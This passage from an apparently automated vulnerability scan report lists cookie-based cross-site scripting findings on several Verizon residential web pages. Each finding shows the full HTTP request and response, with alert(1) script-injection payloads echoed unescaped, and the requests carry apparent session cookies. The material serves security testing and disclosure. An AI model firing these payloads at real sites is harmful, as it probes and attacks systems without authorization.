Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:08:34 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXEF4F6<SCRIPT>ALERT(1)</SCRIPT>B1777447616 </DIV>
...[SNIP]...

1.72. http://www22.verizon.com/Residential/FiOSInternet/Overview.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSInternet/Overview.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 3b903<script>alert(1)</script>3163bfff706 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/Overview.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX3b903<script>alert(1)</script>3163bfff706; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 119132
Expires: Sat, 20 Nov 2010 02:05:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:05:49 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:05:49 GMT; path=/
Set-Cookie: ContextInfo_State=TX3b903<script>alert(1)</script>3163bfff706; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:05:49 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:05:49 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:05:49 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX3B903<SCRIPT>ALERT(1)</SCRIPT>3163BFFF706 </DIV>
...[SNIP]...

1.73. http://www22.verizon.com/Residential/FiOSInternet/Overview.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSInternet/Overview.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 858d1'><script>alert(1)</script>28c31165694 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/Overview.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX858d1'><script>alert(1)</script>28c31165694; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 119136
Expires: Sat, 20 Nov 2010 02:05:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:05:48 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:05:48 GMT; path=/
Set-Cookie: ContextInfo_State=TX858d1'><script>alert(1)</script>28c31165694; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:05:48 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:05:48 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:05:48 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX858D1'><SCRIPT>ALERT(1)</SCRIPT>28C31165694 ' />
...[SNIP]...

1.74. http://www22.verizon.com/Residential/FiOSInternet/Plans/Plans.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSInternet/Plans/Plans.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload b0c47<script>alert(1)</script>29a5c8708a5 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/Plans/Plans.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TXb0c47<script>alert(1)</script>29a5c8708a5; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 150432
Expires: Sat, 20 Nov 2010 02:06:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:06:04 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:06:04 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:06:04 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:06:04 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXB0C47<SCRIPT>ALERT(1)</SCRIPT>29A5C8708A5 </DIV>
...[SNIP]...

1.75. http://www22.verizon.com/Residential/FiOSInternet/Plans/Plans.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSInternet/Plans/Plans.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fd513'><script>alert(1)</script>51bba6f10cc was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/Plans/Plans.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TXfd513'><script>alert(1)</script>51bba6f10cc; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 150436
Expires: Sat, 20 Nov 2010 02:06:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:06:03 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:06:03 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:06:03 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:06:03 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXFD513'><SCRIPT>ALERT(1)</SCRIPT>51BBA6F10CC ' />
...[SNIP]...

1.76. http://www22.verizon.com/Residential/FiOSTV/ [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSTV/

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 918a4'><script>alert(1)</script>038378a935c was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX918a4'><script>alert(1)</script>038378a935c; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 110632
Expires: Sat, 20 Nov 2010 02:05:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:05:28 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:05:28 GMT; path=/
Set-Cookie: ContextInfo_State=TX918a4'><script>alert(1)</script>038378a935c; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:05:28 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:05:28 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:05:28 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX918A4'><SCRIPT>ALERT(1)</SCRIPT>038378A935C ' />
...[SNIP]...

1.77. http://www22.verizon.com/Residential/FiOSTV/ [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSTV/

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload ba647<script>alert(1)</script>c9d82309067 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TXba647<script>alert(1)</script>c9d82309067; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 110628
Expires: Sat, 20 Nov 2010 02:05:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:05:28 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:05:28 GMT; path=/
Set-Cookie: ContextInfo_State=TXba647<script>alert(1)</script>c9d82309067; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:05:28 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:05:28 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:05:28 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXBA647<SCRIPT>ALERT(1)</SCRIPT>C9D82309067 </DIV>
...[SNIP]...

1.78. http://www22.verizon.com/Residential/FiOSTV/Channels/Channels.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSTV/Channels/Channels.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload f50b9<script>alert(1)</script>c084ce429c9 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Channels/Channels.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TXf50b9<script>alert(1)</script>c084ce429c9; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 100939
Expires: Sat, 20 Nov 2010 02:03:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:03:53 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:03:53 GMT; path=/
Set-Cookie: ContextInfo_State=TXf50b9<script>alert(1)</script>c084ce429c9; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:03:53 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:03:53 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:03:53 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXF50B9<SCRIPT>ALERT(1)</SCRIPT>C084CE429C9 </DIV>
...[SNIP]...

1.79. http://www22.verizon.com/Residential/FiOSTV/Channels/Channels.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSTV/Channels/Channels.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6f406'><script>alert(1)</script>4c7a74e2019 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Channels/Channels.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX6f406'><script>alert(1)</script>4c7a74e2019; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 102485
Expires: Sat, 20 Nov 2010 02:03:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:03:52 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:03:52 GMT; path=/
Set-Cookie: ContextInfo_State=TX6f406'><script>alert(1)</script>4c7a74e2019; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:03:52 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:03:52 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:03:52 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX6F406'><SCRIPT>ALERT(1)</SCRIPT>4C7A74E2019 ' />
...[SNIP]...

1.80. http://www22.verizon.com/Residential/FiOSTV/Equipment/Equipment.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSTV/Equipment/Equipment.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 44fe0<script>alert(1)</script>68099989e89 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

